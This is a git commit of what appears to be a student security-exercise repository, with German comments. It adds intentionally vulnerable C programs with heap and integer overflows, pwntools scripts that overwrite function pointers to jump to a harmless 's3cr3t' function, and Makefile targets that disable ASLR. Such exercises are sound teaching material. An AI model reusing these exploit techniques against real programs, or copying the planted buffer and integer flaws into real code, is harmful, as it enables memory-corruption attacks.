commit 66b90de8fe437f3ed7f2b583daf25b07a24fc1ff Author: Ludwig Lehnert Date: Thu May 22 10:44:24 2025 +0200 initial commit diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..1aed4ff --- /dev/null +++ b/.gitignore @@ -0,0 +1,2 @@ +venv/ +.ropeproject/ diff --git a/ex03/heap_overflows/Makefile b/ex03/heap_overflows/Makefile new file mode 100755 index 0000000..284b843 --- /dev/null +++ b/ex03/heap_overflows/Makefile @@ -0,0 +1,24 @@ +CC=gcc +CFLAGS= -std=gnu99 -D_GNU_SOURCE +#CFLAGS= -pie -fPIE -std=gnu99 -D_GNU_SOURCE +OBJ = heap.o +RM = rm -rf +TARGETS = heap +ASLR_ON=/usr/bin/sudo /sbin/sysctl -w kernel.randomize_va_space=2 +ASLR_OFF=/usr/bin/sudo /sbin/sysctl -w kernel.randomize_va_space=0 + +all: $(TARGETS) + +.c.o: + $(CC) $(CFLAGS) -c $< + +aslr_on: + $(ASLR_ON) + +aslr_off: + $(ASLR_OFF) + +clean: + $(RM) $(OBJ) $(TARGETS) + +.PHONY: all clean diff --git a/ex03/heap_overflows/attack.py b/ex03/heap_overflows/attack.py new file mode 100644 index 0000000..fc1c66d --- /dev/null +++ b/ex03/heap_overflows/attack.py @@ -0,0 +1,10 @@ +from pwn import * +import subprocess + +context(arch='amd64', os='linux', log_level='info') + +secret_addr = ELF('./heap').symbols['s3cr3t'] +secret_addr = secret_addr - 0x1000 + 0x555555555000 +arg = b'}' * 24 + p64(secret_addr).rstrip(b'\x00') + +subprocess.run(['./heap', arg]) diff --git a/ex03/heap_overflows/heap.c b/ex03/heap_overflows/heap.c new file mode 100755 index 0000000..03fc1ff --- /dev/null +++ b/ex03/heap_overflows/heap.c @@ -0,0 +1,93 @@ +#include +#include +#include +#include +#include +#include + +typedef struct creds creds_t; + +typedef struct creds { + char name[16]; + bool root; + void (*welcome)(void); +} creds_t; + +static creds_t *creds; + +/* internal prototypes */ +static void login(void); + +static void s3cr3t(void); + +/* entry point */ +int main(int argc, char **argv) { + if (argc < 2) { + printf("usage: %s \n", argv[0]); + return -1; + } + + creds = (creds_t *)calloc(1, sizeof(creds_t)); + if (!creds) { + perror("calloc"); + return -1; + } + + // Super duper cooler patch + if (strlen(argv[1]) >= 16) { + printf("\"%s\" is way too long, I'll give you a KISS\n", argv[1]); + return -1; + } + + // XXX +#if 0 + printf("creds = %#lx\n", (uint64_t) creds); + printf("creds->name = %#lx\n", (uint64_t) &creds->name); + printf("creds->root = %#lx\n", (uint64_t) &creds->root); + printf("creds->welcome = %#lx\n", (uint64_t) &creds->welcome); + printf("login = %#lx\n", (uint64_t) login); + printf("s3cr3t = %#lx\n", (uint64_t) s3cr3t); +#endif + // XXX + + creds->welcome = login; + creds->root = false; + strcpy(creds->name, argv[1]); // Schwachstelle diese hier + creds->welcome(); + free(creds); + return 0; +} + +/* internal function definitions */ +static void login(void) { + printf("Hello %s, you have %s root privileges.\n", creds->name, + ((creds->root) ? "gained" : "no")); +} + +static void s3cr3t(void) { printf("You've gathered secret material!\n"); } + +// aslr_off: Addressraum nicht mehr randomisiert +// +// root: ./heap oarsch_7777777777 +// +// absturz: ./heap oarsch_77777777778888888 +// +// s3cr3t: ./heap oarsch_77777777778888888 +// +// ./heap oarsch_77777777778888888mSUUUU (0x55555555536d = mSUUUU) +// +// bei #if 0 funzt der Angriffsvektor natuerlich nimmer, weil code von s3cr3t verschoben +// (Instruktionen fehlen ja jetzat) +// +// from pwn import * +// import subprocess +// +// context(arch='amd64', os='linux', log_level='info') +// +// secret_addr = ELF('./heap').symbols['s3cr3t'] +// secret_addr = secret_addr - 0x1000 + 0x555555555000 +// arg = b'}' * 24 + p64(secret_addr).rstrip(b'\x00') +// +// subprocess.run(['./heap', arg]) +// +// diff --git a/ex03/int_overflows/Makefile b/ex03/int_overflows/Makefile new file mode 100755 index 0000000..309c5d5 --- /dev/null +++ b/ex03/int_overflows/Makefile @@ -0,0 +1,15 @@ +CC=gcc +CFLAGS= -std=gnu99 -D_GNU_SOURCE +OBJ = int01.o int03.o +RM = rm -rf +TARGETS = int01 int03 + +all: $(TARGETS) + +.c.o: + $(CC) $(CFLAGS) -c $< + +clean: + $(RM) $(OBJ) $(TARGETS) + +.PHONY: all clean diff --git a/ex03/int_overflows/int01.c b/ex03/int_overflows/int01.c new file mode 100755 index 0000000..7c50083 --- /dev/null +++ b/ex03/int_overflows/int01.c @@ -0,0 +1,115 @@ +/* includes */ +#include +#include +#include +#include + +/* internal prototypes */ +static void a(void); + +static void b(const char *str); + +static void c(void); + +int main(int argc, char **argv) { + a(); + if (argc > 1) { + b(argv[1]); + } else { + printf("\nAufgabe b)\nTODO: Uebergeben Sie eine Zahl auf der Kommandozeile " + "um Funktion b() auszufuehren.\n"); + } + c(); + return 0; +} + +/* internal function definitions */ +static void a(void) { + /* displays the size and ranges of the fixed size integer types */ + printf("\nAufgabe a)\n"); + + int8_t i8_min = 0x80; + int8_t i8_max = 0x7f; + + uint8_t u8_min = 0; + uint8_t u8_max = 0xff; + + int16_t i16_min = 0x8000; + int16_t i16_max = 0x7fff; + + uint16_t u16_min = 0; + uint16_t u16_max = 0xffff; + + int32_t i32_min = 0x80000000; + int32_t i32_max = 0x7fffffff; + + uint32_t u32_min = 0; + uint32_t u32_max = 0xffffffff; + + int64_t i64_min = 0x8000000000000000; + int64_t i64_max = 0x7fffffffffffffff; + + uint64_t u64_min = 0; + uint64_t u64_max = 0xffffffffffffffff; + + printf("i8_min: %hhd, i8_max: %hhd\n", i8_min, i8_max); + printf("u8_min: %hhu, u8_max: %hhu\n", u8_min, u8_max); + printf("i16_min: %hd, i16_max: %hd\n", i16_min, i16_max); + printf("u16_min: %hu, u16_max: %hu\n", u16_min, u16_max); + printf("i32_min: %d, i32_max: %d\n", i32_min, i32_max); + printf("u32_min: %u, u32_max: %u\n", u32_min, u32_max); + printf("i64_min: %ld, i64_max: %ld\n", i64_min, i64_max); + printf("u64_min: %lu, u64_max: %lu\n", u64_min, u64_max); +} + +// gib einfach 2147483648 +static void b(const char *str) { + /* No compiler warnings anymore */ + printf("\nAufgabe b)\n"); + char *endptr; + errno = 0; + int32_t s32 = (int32_t)strtol(str, &endptr, 10); + if (errno || *endptr) { + fprintf(stderr, "Conversion error, non-convertible part: %s\n", endptr); + } else { + printf("s32 = %d\n", s32); + } +} + +static void c(void) { + /* gcc generates compiler warnings (-Woverflow) */ + printf("\nAufgabe c)\n"); + + const int8_t target = 42; + + uint8_t u8 = 122; + int8_t s8 = 100; + uint16_t u16 = 1567; + int16_t s16 = 3000; + uint32_t u32 = 5049039; + int32_t s32 = 93049309; + uint64_t u64 = 90394039403; + int64_t s64 = 59848904909; + + uint8_t u8_comp = target + 255 - u8 + 1; + uint16_t u16_comp = target + 65535 - u16 + 1; + uint32_t u32_comp = target + 4294967295 - u32 + 1; + uint64_t u64_comp = target + 18446744073709551615 - u64 + 1; + + int8_t s8_comp = target + 255 - ((uint8_t) s8) + 1; + int16_t s16_comp = target + 65535 - ((uint16_t) s16) + 1; + int32_t s32_comp = target + 4294967295 - ((uint32_t) s32) + 1; + int64_t s64_comp = target + 18446744073709551615 - ((uint64_t) s64) + 1; + + printf("u8: %hhu\n", u8 + u8_comp); + printf("u16: %hu\n", u16 + u16_comp); + printf("u32: %u\n", u32 + u32_comp); + printf("u64: %lu\n", u64 + u64_comp); + + printf("s8: %hhd\n", s8 + s8_comp); + printf("s16: %hd\n", s16 + s16_comp); + printf("s32: %d\n", s32 + s32_comp); + printf("s64: %ld\n", s64 + s64_comp); +} + +// int02: s8, s16, u32 diff --git a/ex03/int_overflows/int03.c b/ex03/int_overflows/int03.c new file mode 100755 index 0000000..0936d0e --- /dev/null +++ b/ex03/int_overflows/int03.c @@ -0,0 +1,74 @@ +/* includes */ +#include +#include +#include +#include +#include + +/* internal protoypes */ +static void print(void); + +static void insert(const char *name, uint32_t index); + +typedef struct cred { + char name[16]; +} cred_t; + +static cred_t creds[8]; + +#define ADMIN "root" + +// ./int03 huan 4294967296 + +/* entry point */ +int main(int argc, char **argv) { + if (argc < 3) { + printf("usage: %s \n", argv[0]); + return -1; + } + char *endptr; + errno = 0; + uint32_t index = (uint32_t)strtoull(argv[2], &endptr, 10); + if (errno || *endptr) { + fprintf(stderr, "Conversion error, non-convertible part: %s\n", endptr); + exit(EXIT_FAILURE); + } + + snprintf(creds[0].name, 16, "%s", ADMIN); + if (index == 0) { + fprintf(stderr, "ALERT: someone tried to overwrite admin account!\n"); + exit(EXIT_FAILURE); + } + + insert(argv[1], index); + print(); + return 0; +} + +/* internal function definitions */ +static void insert(const char *name, uint32_t index) { + if (index > 7) { + fprintf(stderr, "Invalid index\n"); + exit(EXIT_FAILURE); + } + if (strlen(name) > 15) { + fprintf(stderr, "Name must not exceed 15 characters\n"); + exit(EXIT_FAILURE); + } + snprintf(creds[index].name, 16, "%s", name); +} + +static void print(void) { + for (int i = 0; i < 8; ++i) { + if (i == 0) { + printf("Admin: "); + } else { + printf("User: "); + } + if (strcmp(creds[i].name, "")) { + printf("%s\n", creds[i].name); + } else { + printf("unknown\n"); + } + } +} diff --git a/ex03/mixed/Makefile b/ex03/mixed/Makefile new file mode 100755 index 0000000..34d97b0 --- /dev/null +++ b/ex03/mixed/Makefile @@ -0,0 +1,23 @@ +CC=gcc +CFLAGS= -std=gnu99 -D_GNU_SOURCE +OBJ = mixed01.o mixed02.o mixed03.o mixed04.o +RM = rm -rf +TARGETS = mixed01 mixed02 mixed03 mixed04 +ASLR_ON=/sbin/sysctl -w kernel.randomize_va_space=2 +ASLR_OFF=/sbin/sysctl -w kernel.randomize_va_space=0 + +all: $(TARGETS) + +.c.o: + $(CC) $(CFLAGS) -c $< + +aslr_on: + $(ASLR_ON) + +aslr_off: + $(ASLR_OFF) + +clean: + $(RM) $(OBJ) $(TARGETS) + +.PHONY: all clean diff --git a/ex03/mixed/mixed01.c b/ex03/mixed/mixed01.c new file mode 100755 index 0000000..7b8c28a --- /dev/null +++ b/ex03/mixed/mixed01.c @@ -0,0 +1,51 @@ +#include +#include +#include +#include +#include +#include + +typedef struct creds creds_t; + +typedef struct creds { + char name[16]; + void (*welcome)(void); +} creds_t; + +static creds_t *creds; + +/* internal prototypes */ +static void login(void); + +static void s3cr3t(void); + +/* entry point */ +// ./mixed01 aaaaaaaaaaaaaaaaa 65536 +int main(int argc, char **argv) { + if (argc < 3) { + printf("usage: %s \n", argv[0]); + return -1; + } + int32_t size = atoi(argv[2]); + uint16_t s = size; + creds = (creds_t *)calloc(1, sizeof(creds_t)); + if (!creds) { + perror("calloc"); + return -1; + } + if (s >= sizeof(creds->name)) { + fprintf(stderr, "length exceeds buffer size\n"); + free(creds); + return -1; + } + creds->welcome = login; + snprintf(creds->name, size + 1, "%s", argv[1]); + creds->welcome(); + free(creds); + return 0; +} + +/* internal function definitions */ +static void login(void) { printf("Hello %s.\n", creds->name); } + +static void s3cr3t(void) { printf("You've gathered secret material!\n"); } diff --git a/ex03/mixed/mixed01.py b/ex03/mixed/mixed01.py new file mode 100644 index 0000000..980691c --- /dev/null +++ b/ex03/mixed/mixed01.py @@ -0,0 +1,10 @@ +from pwn import * +import subprocess + +context(arch='amd64', os='linux', log_level='info') + +secret_addr = ELF('./mixed01').symbols['s3cr3t'] +secret_addr = secret_addr - 0x1000 + 0x555555555000 +arg = b'}' * 16 + p64(secret_addr).rstrip(b'\x00') + +subprocess.run(['./mixed01', arg, '65536']) diff --git a/ex03/mixed/mixed02.c b/ex03/mixed/mixed02.c new file mode 100755 index 0000000..6850c03 --- /dev/null +++ b/ex03/mixed/mixed02.c @@ -0,0 +1,72 @@ +#include +#include +#include +#include +#include +#include + +#define BUF_SIZE 128 + +typedef struct creds creds_t; + +typedef struct creds { + char str[BUF_SIZE]; + void (*welcome)(void); +} creds_t; +static creds_t *creds; + +/* internal prototypes */ +static void cat(const char *s1, uint32_t len1, const char *s2, uint32_t len2); + +static void print(void); + +static void s3cr3t(void); + +/* entry point */ +// ./mixed02 dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd 4294967295 d 10 +int main(int argc, char **argv) { + if (argc < 5) { + printf("usage: %s \n", argv[0]); + return -1; + } + + char *endptr; + errno = 0; + uint32_t len1 = (uint32_t)strtoul(argv[2], &endptr, 10); + if (errno || *endptr) { + fprintf(stderr, "Conversion error, non-convertible part: %s\n", endptr); + exit(EXIT_FAILURE); + } + errno = 0; + uint32_t len2 = (uint32_t)strtoul(argv[4], &endptr, 10); + if (errno || *endptr) { + fprintf(stderr, "Conversion error, non-convertible part: %s\n", endptr); + exit(EXIT_FAILURE); + } + + creds = (creds_t *)calloc(1, sizeof(creds_t)); + if (!creds) { + perror("calloc"); + return -1; + } + creds->welcome = print; + cat(argv[1], len1, argv[3], len2); + creds->welcome(); + free(creds); + return 0; +} + +/* internal function definitions */ +static void cat(const char *s1, uint32_t len1, const char *s2, uint32_t len2) { + if ((len1 + len2) >= BUF_SIZE) { + fprintf(stderr, "Input strings exceed buffer size\n"); + exit(EXIT_FAILURE); + } + snprintf(creds->str, len1 + 1, "%s", s1); + // TODO: creds->str+len1+1 + snprintf(creds->str + len1, len2 + 1, "%s", s2); +} + +static void print(void) { printf("%s!\n", creds->str); } + +static void s3cr3t(void) { printf("You've gathered secret material!\n"); } diff --git a/ex03/mixed/mixed02.py b/ex03/mixed/mixed02.py new file mode 100644 index 0000000..96ce1b7 --- /dev/null +++ b/ex03/mixed/mixed02.py @@ -0,0 +1,12 @@ +from pwn import * +import subprocess + +context(arch='amd64', os='linux', log_level='info') + +secret_addr = ELF('./mixed02').symbols['s3cr3t'] +secret_addr = secret_addr - 0x1000 + 0x555555555000 + +arg0 = b'}' * 127 +arg1 = b'}' + p64(secret_addr).rstrip(b'\x00') + +subprocess.run(['./mixed02', arg0, '127', arg1, '4294967294']) diff --git a/ex03/mixed/mixed03.c b/ex03/mixed/mixed03.c new file mode 100755 index 0000000..84436f2 --- /dev/null +++ b/ex03/mixed/mixed03.c @@ -0,0 +1,64 @@ +#include +#include +#include +#include +#include +#include + +#define BUF_SIZE 128 + +typedef struct creds creds_t; + +typedef struct creds { + char str[BUF_SIZE]; + void (*welcome)(void); +} creds_t; +static creds_t *creds; + +/* internal prototypes */ +static void copy(const char *s, int32_t len1); + +static void print(void); + +static void s3cr3t(void); + +/* entry point */ +int main(int argc, char **argv) { + if (argc < 3) { + printf("usage: %s \n", argv[0]); + return -1; + } + + char *endptr; + errno = 0; + int32_t len = (int32_t)strtol(argv[2], &endptr, 10); + if (errno || *endptr) { + fprintf(stderr, "Conversion error, non-convertible part: %s\n", endptr); + exit(EXIT_FAILURE); + } + + creds = (creds_t *)calloc(1, sizeof(creds_t)); + if (!creds) { + perror("calloc"); + return -1; + } + + creds->welcome = print; + copy(argv[1], len); + creds->welcome(); + free(creds); + return 0; +} + +/* internal function definitions */ +static void copy(const char *s, int32_t len) { + if (len >= BUF_SIZE) { + fprintf(stderr, "string length exceeds buffer size\n"); + exit(EXIT_FAILURE); + } + snprintf(creds->str, len + 1, "%s", s); +} + +static void print(void) { printf("%s\n", creds->str); } + +static void s3cr3t(void) { printf("You've gathered secret material!\n"); } diff --git a/ex03/mixed/mixed03.py b/ex03/mixed/mixed03.py new file mode 100644 index 0000000..b8dd5f2 --- /dev/null +++ b/ex03/mixed/mixed03.py @@ -0,0 +1,12 @@ +from pwn import * +import subprocess + +context(arch='amd64', os='linux', log_level='info') + +secret_addr = ELF('./mixed03').symbols['s3cr3t'] +secret_addr = secret_addr - 0x1000 + 0x555555555000 + +arg = b'}' * 128 + p64(secret_addr).rstrip(b'\x00') + b'{' +print(arg) + +subprocess.run(['./mixed03', arg, '-2']) diff --git a/ex03/mixed/mixed04.c b/ex03/mixed/mixed04.c new file mode 100755 index 0000000..12dba25 --- /dev/null +++ b/ex03/mixed/mixed04.c @@ -0,0 +1,81 @@ +#include +#include +#include +#include +#include +#include + +#define NUM_ELEMENTS 8 + +typedef struct creds creds_t; + +typedef struct creds { + void (*welcome)(void); + uint64_t buffer[NUM_ELEMENTS]; +} creds_t; +static creds_t *creds; + +/* internal prototypes */ +static void insert(uint64_t value, int64_t index); + +static void print(void); + +static void s3cr3t(void); + +/* entry point */ +int main(int argc, char **argv) { + if (argc < 3) { + printf("usage: %s \n", argv[0]); + return -1; + } + + char *endptr; + errno = 0; + uint64_t value = (uint64_t)strtoull(argv[1], &endptr, 16); + if (errno || *endptr) { + fprintf(stderr, "Conversion error, non-convertible part: %s\n", endptr); + exit(EXIT_FAILURE); + } + + errno = 0; + uint64_t index = (uint64_t)strtoull(argv[2], &endptr, 10); + if (errno || *endptr) { + fprintf(stderr, "Conversion error, non-convertible part: %s\n", endptr); + exit(EXIT_FAILURE); + } + + if (index < 0) { + fprintf(stderr, "Negative index\n"); + exit(EXIT_FAILURE); + } + + creds = (creds_t *)calloc(1, sizeof(creds_t)); + if (!creds) { + perror("calloc"); + return -1; + } + + creds->welcome = print; + insert(value, index); + creds->welcome(); + free(creds); + return 0; +} + +/* internal function definitions */ +static void insert(uint64_t value, int64_t index) { + if (index >= NUM_ELEMENTS) { + fprintf(stderr, "Invalid index!\n"); + exit(EXIT_FAILURE); + } + + creds->buffer[index] = value; +} + +static void print(void) { + for (int i = 0; i < NUM_ELEMENTS; ++i) { + printf("Index %d: %#lx\n", i, creds->buffer[i]); + } +} + +static void s3cr3t(void) { printf("You've gathered secret material!\n"); } diff --git a/ex03/mixed/mixed04.py b/ex03/mixed/mixed04.py new file mode 100644 index 0000000..e165072 --- /dev/null +++ b/ex03/mixed/mixed04.py @@ -0,0 +1,9 @@ +from pwn import * +import subprocess + +context(arch='amd64', os='linux', log_level='info') + +secret_addr = ELF('./mixed04').symbols['s3cr3t'] +secret_addr = secret_addr - 0x1000 + 0x555555555000 + +subprocess.run(['./mixed04', hex(secret_addr), str(2 ** 64 - 1)])